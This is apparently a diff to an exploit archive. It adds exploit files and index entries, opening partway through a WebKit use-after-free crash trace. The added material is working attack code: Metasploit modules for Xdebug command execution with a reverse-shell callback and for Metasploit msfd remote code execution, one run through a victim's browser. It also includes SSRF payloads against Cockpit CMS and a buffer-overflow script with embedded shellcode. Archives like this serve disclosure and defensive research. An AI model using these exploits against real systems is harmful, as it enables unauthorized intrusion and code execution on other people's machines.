+    #25 0x10b948c6e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x13cc6e)
+    #26 0x10b952a06 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x146a06)
+    #27 0x3110f6837 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ff1837)
+    #28 0x3110f7246 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ff2246)
+    #29 0x7fff51301720 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa3720)
+
+SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe0a06) in WTF::Ref<WebCore::StyleRareInheritedData, WTF::DumbPtrTraits<WebCore::StyleRareInheritedData> >::ptr() const
+Shadow bytes around the buggy address:
+  0x1c2400013c40: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
+  0x1c2400013c50: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
+  0x1c2400013c60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2400013c70: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
+  0x1c2400013c80: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
+=>0x1c2400013c90: fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd
+  0x1c2400013ca0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2400013cb0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
+  0x1c2400013cc0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c2400013cd0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
+  0x1c2400013ce0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==26541==ABORTING
+-->
--- a/exploits/php/remote/44568.rb
+++ b/exploits/php/remote/44568.rb
@ -0,0 +1,114 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
+  include Rex::Proto::Http
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'xdebug Unauthenticated OS Command Execution',
+      'Description' => %q{
+       Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
+       This allows the attacker to execute arbitrary php code as the context of the web user.
+      },
+      'DisclosureDate' => 'Sep 17 2017',
+      'Author' => [
+        'Ricter Zheng', #Discovery https://twitter.com/RicterZ
+        'Shaksham Jaiswal', # MinatoTW
+        'Mumbai' # Austin Hudson
+      ],
+      'References' => [
+        ['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
+        ['URL', 'https://paper.seebug.org/397/']
+      ],
+      'License' => MSF_LICENSE,
+      'Platform' => 'php',
+      'Arch' => [ARCH_PHP],
+      'DefaultTarget' => 0,
+      'Stance' => Msf::Exploit::Stance::Aggressive,
+      'DefaultOptions' => {
+        'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+      },
+      'Payload' => {
+        'DisableNops' => true,
+      },
+      'Targets' => [[ 'Automatic', {} ]],
+    ))
+
+    register_options([
+        OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
+        OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
+        OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
+        Opt::RPORT(80),
+        OptString.new('WriteableDir', [ true, "A writeable directory on the target", "/tmp"])
+    ])
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri' => datastore["PATH"],
+        'method' => 'GET',
+          'vars_get' => {
+          'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
+       }
+      })
+      vprint_status "Request sent\n#{res.headers}"
+      if res && res.headers.to_s =~ /XDEBUG/i
+        vprint_good("Looks like remote server has xdebug enabled\n")
+        return CheckCode::Detected
+      else
+        return CheckCode::Safe
+      end
+      rescue Rex::ConnectionError
+        return CheckCode::Unknown
+    end
+  end
+
+  def exploit
+    payl = Rex::Text.encode_base64("#{payload.encoded}")
+    file = "#{datastore['WriteableDir']}"+"/"+rand_text_alphanumeric(5)
+    cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("file_put_contents(\"#{file}\",base64_decode(\"#{payl}\")) && system(\" php #{file} \")") + "\x00"
+    webserver = Thread.new do
+    begin
+      server = Rex::Socket::TcpServer.create(
+        'LocalPort' => datastore['SRVPORT'],
+        'LocalHost' => datastore['SRVHOST'],
+        'Context' => {
+          'Msf' => framework,
+          'MsfExploit' => self
+      })
+
+      client = server.accept
+      print_status("Waiting for client response.")
+      data = client.recv(1024)
+      print_status("Receiving response")
+      vprint_line(data)
+      print_status("Shell might take upto a minute to respond.Please be patient.")
+      print_status("Sending payload of size #{cmd1.length} bytes")
+      register_file_for_cleanup(file)
+      client.write(cmd1)
+      client.close
+      server.close
+      webserver.exit
+    ensure
+      webserver.exit
+    end
+    end
+    send_request_cgi({
+        'uri' => datastore['PATH'],
+        'method' => 'GET',
+        'headers' => {
+          'X-Forwarded-For' => "#{lhost}",
+          'Cookie' => 'XDEBUG_SESSION='+rand_text_alphanumeric(10)
+        }
+    })
+  end
+end
--- a/exploits/php/webapps/44557.rb
+++ b/exploits/php/webapps/44557.rb
--- a/exploits/php/webapps/44567.txt
+++ b/exploits/php/webapps/44567.txt
@ -0,0 +1,92 @@
+# SSRF（Server Side Request Forgery） in Cockpit 0.4.4-0.5.5 (CVE-2018-9302)
+
+Cockpit CMS repairs CVE-2017-14611, but it can be bypassed, SSRF still exist, affecting the Cockpit CMS 0.4.4-0.5.5 versions.I've been tested success of "Cockpit CMS" lastest version.
+
+## Product Download: Cockpit (https://getcockpit.com)
+
+## Vulnerability Type：SSRF（Server Side Request Forgery）
+
+## Attack Type : Remote
+
+## Vulnerability Description
+
+You can edit a .php file on own server. The .php file's code example:
+
+<?php Header("Location: dict://127.0.0.1:3306/_0d%");?>
+
+## Exploit
+Request:
+
+    GET /assets/lib/fuc.js.php?url=http://myserver/redirect.php HTTP/1.1
+    Host: myserver
+    Connection: close
+    Cache-Control: max-age=0
+    Upgrade-Insecure-Requests: 1
+    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
+    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+    Accept-Language: zh-CN,zh;q=0.8
+    referer:http://myserver/index.php
+
+
+Modify the redirect.php file on the attacker's server.example:
+    <?php Header("Location: gopher://127.0.0.1:3306/_0d%");?>
+
+If the curl function is available,then use gopher、tftp、http、https、dict、ldap、imap、pop3、smtp、telnet protocols method，if not then only use http、https、ftp protocol
+scan prot,example: <?php Header("Location: dict://127.0.0.1:3306/");?> 
+
+If the curl function is unavailable,this vulnerability trigger need allow_url_fopen option is enable in php.ini，allow_url_fopen option defualt is enable.
+
+## Versions
+
+Product: Cockpit CMS 0.4.4-0.5.5
+
+## Impact
+
+SSRF (Server Side Request Forgery) in /assets/lib/fuc.js.php in Cockpit 0.4.4 through 0.5.5 allows remote attackers to read arbitrary files or send TCP traffic to intranet hosts via the url parameter.
+
+## Fix Code
+
+The fix code example：
+
+    $url     = $_REQUEST['url'];
+    $content = null;
+    if (!filter_var($url, FILTER_VALIDATE_URL)) {
+
+        header('HTTP/1.0 400 Bad Request');
+        return;
+    }
+
+    // allow only http requests
+    if (!preg_match('#^http(|s)\://#', $url)) {
+        header('HTTP/1.0 403 Forbidden');
+        return;
+    }
+    preg_match('/https*:\/\/(.+)/', $url, $matches);
+    $host= count($matches) > 1 ? $matches[1] : '';
+    $ip = gethostbyname($host);
+    //check private ip
+    if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE)) {
+        return
+    }
+
+and modify the line 48 :
+
+    curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 0);
+
+## Credit
+
+This vulnerability was discovered by Qian Wu & Bo Wang & Jiawang Zhang &  National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT/CC)
+
+## References
+
+CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9302
+
+### Timeline:
+
+2018-04-03  Found Cockpit CMS vulnerability.
+
+2018-04-04  Submit vulnerability information to developers.
+
+2018-04-05  Submit CVE-ID request
+
+2018-04-28  Vendor no response, Public vulnerability information,Please Fix it.
--- a/exploits/ruby/remote/44569.rb
+++ b/exploits/ruby/remote/44569.rb
@ -0,0 +1,77 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(update_info(info,
+     'Name'           => 'Metasploit msfd Remote Code Execution via Browser',
+     'Description'    => %q{
+      Metasploit's msfd-service makes it possible to get a msfconsole-like
+      interface over a TCP socket. This module connects to the msfd-socket
+      through the victim's browser.
+
+      To execute msfconsole-commands in JavaScript from a web application,
+      this module places the payload in the POST-data. These POST-requests
+      can be sent cross-domain and can therefore be sent to localhost on the
+      victim's machine. The msfconsole-command to execute code is 'rbi -e
+      "CODE"'.
+
+      Exploitation when the browser is running on Windows is unreliable and
+      the exploit is only usable when IE is used and the quiet-flag has been
+      passed to msf-daemon.
+      },
+      'License'        => BSD_LICENSE,
+      'Author'         => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
+      'Platform'       => 'ruby',
+      'Arch'           => ARCH_RUBY,
+      'Targets'        =>
+        [
+          [ 'Automatic', {}],
+        ],
+      'Payload'        =>
+        {
+          'Space' => 8192,  # Arbitrary limit
+          'DisableNops' =>  'True',
+          'BadChars' => "\x22\x0a"
+        },
+      'DisclosureDate' => 'Apr 11 2018',  # Vendor notification
+      'DefaultTarget'  => 0))
+
+      register_options([
+        OptString.new('REMOTE_IP', [true, 'Remote IP address when called from victim', '127.0.0.1']),
+        OptString.new('REMOTE_PORT', [true, 'Remote port the service is running at', '55554'])
+      ])
+  end
+
+  def exploit
+    super
+  end
+
+  def on_request_uri(cli, request)
+    msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
+    sc = payload.encoded
+    shellcode = "\\x" + sc.unpack('U'*sc.length).collect {|x| x.to_s 16}.join("\\x")
+    var1 = rand_text_alpha(rand(6..11))
+    var2 = rand_text_alpha(rand(6..11))
+    html =  <<-EOS
+<html>
+<head></head>
+<body>
+<script>
+var #{var1} = new XMLHttpRequest();
+#{var1}.open("POST","http://#{datastore['REMOTE_IP']}:#{datastore['REMOTE_PORT']}/", true);
+var #{var2} = String("#{shellcode}");
+#{var1}.send("irb -e \\"" + #{var2} + "\\"\\n");
+</script>
+</body>
+</html>
+EOS
+    print_status("#{msg} Sending HTML...")
+    send_response(cli, html, { 'Content-Type' => 'text/html' })
+  end
+end
--- a/exploits/ruby/remote/44570.rb
+++ b/exploits/ruby/remote/44570.rb
@ -0,0 +1,66 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Metasploit msfd Remote Code Execution',
+      'Description'    => %q{
+      Metasploit's msfd-service makes it possible to get a msfconsole-like
+      interface over a TCP socket. If this socket is accessible on a remote
+      interface, an attacker can execute commands on the victim's machine.
+
+      If msfd is running with higher privileges than the current local user,
+      this module can also be used for privilege escalation. In that case,
+      port forwarding on the compromised host can be used.
+
+      Code execution is achieved with the msfconsole command: irb -e 'CODE'.
+      },
+      'Author'         => 'Robin Stenvi <robin.stenvi[at]gmail.com>',
+      'License'        => BSD_LICENSE,
+      'Platform'       => "ruby",
+      'Arch'           => ARCH_RUBY,
+      'Payload'        =>
+        {
+          'Space'    => 8192,   # Arbitrary limit
+          'BadChars' => "\x27\x0a",
+          'DisableNops' => true
+        },
+      'Targets'  =>
+        [
+          [ 'Automatic', { } ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Apr 11 2018',  # Vendor notification
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(55554)
+      ])
+  end
+
+  def check
+    connect
+    data = sock.get_once
+    if data.include?("msf")
+      disconnect
+      return Exploit::CheckCode::Appears
+    end
+    disconnect
+    return Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    connect
+    sock.get_once
+    sock.put "irb -e '" + payload.encoded + "'\n"
+    disconnect
+  end
+end
--- a/exploits/windows/local/44564.py
+++ b/exploits/windows/local/44564.py
--- a/exploits/windows/local/44565.py
+++ b/exploits/windows/local/44565.py
@ -0,0 +1,41 @@
+#!/usr/bin/python
+ 
+# Exploit Title: Easy MPEG to DVD Burner 1.7.11 SEH Local Buffer Overflow
+# Date: 2018-05-02
+# Exploit Author: Marwan Shamel
+# Software Link: https://downloads.tomsguide.com/MPEG-Easy-Burner,0301-10418.html
+# Version: 1.7.11
+# Tested on: Windows 7 Enterprise SP1 32 bit
+# Special thanks to my wife
+# Steps : Open the APP > click on register > Username field > just paste watever generated from python script in the txt file.
+
+junk = "\x42" * 1008  
+# below shell code will open calc.exe can be changed according to your needs just make sure to avoid bad chars x0d x00 x0a
+evil =  ""
+evil += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
+evil += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
+evil += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
+evil += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
+evil += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
+evil += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
+evil += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
+evil += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
+evil += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
+evil += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
+evil += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
+evil += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
+evil += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
+evil += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
+evil += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
+evil += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
+evil += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
+
+
+
+nSEH = "\xeb\x0C\x90\x90"  #Jmp short 14 (EB0C)
+SEH = "\xae\x4a\x01\x10"   #pop ebp # pop ebx # ret (DLL have ASLR,safeSEH,rebase off)   
+nop = "\x90" * 16
+data = junk + nSEH + SEH + nop + evil
+f = open ("Evil.txt", "w")
+f.write(data)
+f.close()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -5957,6 +5957,7 @@ id,file,description,date,author,type,platform,port
 44558,exploits/windows/dos/44558.py,"Navicat < 12.0.27 - Oracle Connection Overflow",2018-04-30,"Kevin McGuigan",dos,windows,
 44561,exploits/macos/dos/44561.txt,"Apple macOS 10.13.2 - Double mach_port_deallocate in kextd due to Failure to Comply with MIG Ownership Rules",2018-04-30,"Google Security Research",dos,macos,
 44562,exploits/multiple/dos/44562.c,"Apple macOS/iOS - ReportCrash mach port Replacement due to Failure to Respect MIG Ownership Rules",2018-04-30,"Google Security Research",dos,multiple,
+44566,exploits/multiple/dos/44566.html,"WebKit - 'WebCore::jsElementScrollHeightGetter' Use-After-Free",2018-05-02,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9688,6 +9689,8 @@ id,file,description,date,author,type,platform,port
 44518,exploits/windows/local/44518.py,"Allok Video to DVD Burner 2.6.1217 - Buffer Overflow (SEH)",2018-04-24,T3jv1l,local,windows,
 44523,exploits/linux/local/44523.rb,"lastore-daemon D-Bus - Privilege Escalation (Metasploit)",2018-04-24,Metasploit,local,linux,
 44549,exploits/windows/local/44549.py,"Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)",2018-04-26,T3jv1l,local,windows,
+44564,exploits/windows/local/44564.py,"LibreOffice/Open Office - '.odt' Information Disclosure",2018-05-02,"Richard Davy",local,windows,
+44565,exploits/windows/local/44565.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH)",2018-05-02,"Marwan Shamel",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16441,13 +16444,16 @@ id,file,description,date,author,type,platform,port
 44482,exploits/php/remote/44482.rb,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)",2018-04-17,"José Ignacio Rojo",remote,php,80
 44485,exploits/windows/remote/44485.py,"Easy File Sharing Web Server 7.2 - Stack Buffer Overflow",2018-04-18,rebeyond,remote,windows,80
 44522,exploits/windows/remote/44522.py,"Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass)",2018-04-24,"Hashim Jawad",remote,windows,
-44524,exploits/hardware/remote/44524.rb,"ASUS infosvr - Auth Bypass Command Execution (Metasploit)",2018-04-24,Metasploit,remote,hardware,9999
+44524,exploits/hardware/remote/44524.rb,"ASUS infosvr - Authentication Bypass Command Execution (Metasploit)",2018-04-24,Metasploit,remote,hardware,9999
 44552,exploits/multiple/remote/44552.py,"Websphere/JBoss/OpenNMS/Symantec Endpoint Protection Manager - Java Deserialization Remote Code Execution",2016-07-20,"Nikhil Sreekumar",remote,multiple,
 44553,exploits/multiple/remote/44553.py,"Oracle Weblogic Server 10.3.6.0 / 12.1.3.0 / 12.2.1.2 / 12.2.1.3 - Deserialization Remote Command Execution",2018-04-22,brianwrf,remote,multiple,
 44554,exploits/android/remote/44554.py,"Android Bluetooth - 'Blueborne' Information Leak (1)",2017-08-09,"Kert Ojasoo",remote,android,
 44555,exploits/android/remote/44555.py,"Android Bluetooth - 'Blueborne' Information Leak (2)",2017-09-20,"Kert Ojasoo",remote,android,
 44556,exploits/multiple/remote/44556.py,"Apache Struts 2.0.1 < 2.3.33 / 2.5 < 2.5.10 - Arbitrary Code Execution",2017-09-08,brianwrf,remote,multiple,
-44557,exploits/php/remote/44557.rb,"Drupal < 7.58 - 'Drupalgeddon3' Authenticated Remote Code (Metasploit)",2018-04-30,SixP4ck3r,remote,php,
+44568,exploits/php/remote/44568.rb,"xdebug < 2.5.5 - Unauthenticated OS Command Execution (Metasploit)",2018-05-02,Metasploit,remote,php,80
+44569,exploits/ruby/remote/44569.rb,"Metasploit Framework - 'msfd' Remote Code Execution (via Browser) (Metasploit)",2018-05-02,Metasploit,remote,ruby,55554
+44570,exploits/ruby/remote/44570.rb,"Metasploit Framework - 'msfd' Remote Code Execution (Metasploit)",2018-05-02,Metasploit,remote,ruby,55554
+44571,exploits/linux/remote/44571.py,"Exim < 4.90.1 - 'base64d' Remote Code Execution",2018-05-02,straight_blast,remote,linux,25
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39246,6 +39252,8 @@ id,file,description,date,author,type,platform,port
 44548,exploits/php/webapps/44548.py,"GitList 0.6 - Unauthenticated Remote Code Execution",2018-04-26,"Kacper Szurek",webapps,php,
 44550,exploits/hardware/webapps/44550.txt,"TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Unauthenticated Remote Reboot",2018-04-26,Wadeek,webapps,hardware,
 44551,exploits/php/webapps/44551.txt,"Frog CMS 0.9.5 - Persistent Cross-Site Scripting",2018-04-26,"Wenming Jiang",webapps,php,80
+44557,exploits/php/webapps/44557.rb,"Drupal < 7.58 - 'Drupalgeddon3' Authenticated Remote Code (Metasploit)",2018-04-30,SixP4ck3r,webapps,php,
 44559,exploits/php/webapps/44559.txt,"WordPress Plugin Form Maker 1.12.20 - CSV Injection",2018-04-30,"Sairam Jetty",webapps,php,
 44560,exploits/php/webapps/44560.py,"Nagios XI 5.2.6 < 5.2.9 / 5.3 / 5.4 - Chained Remote Root",2018-04-30,"Jared Arave",webapps,php,
 44563,exploits/php/webapps/44563.txt,"WordPress Plugin Responsive Cookie Consent 1.7 / 1.6 / 1.5 - Authenticated Persistent Cross-Site Scripting",2018-05-01,B0UG,webapps,php,
+44567,exploits/php/webapps/44567.txt,"Cockpit CMS 0.4.4 < 0.5.5 - Server-Side Request Forgery",2018-05-02,"Qian Wu_ Bo Wang_ Jiawang Zhang",webapps,php,80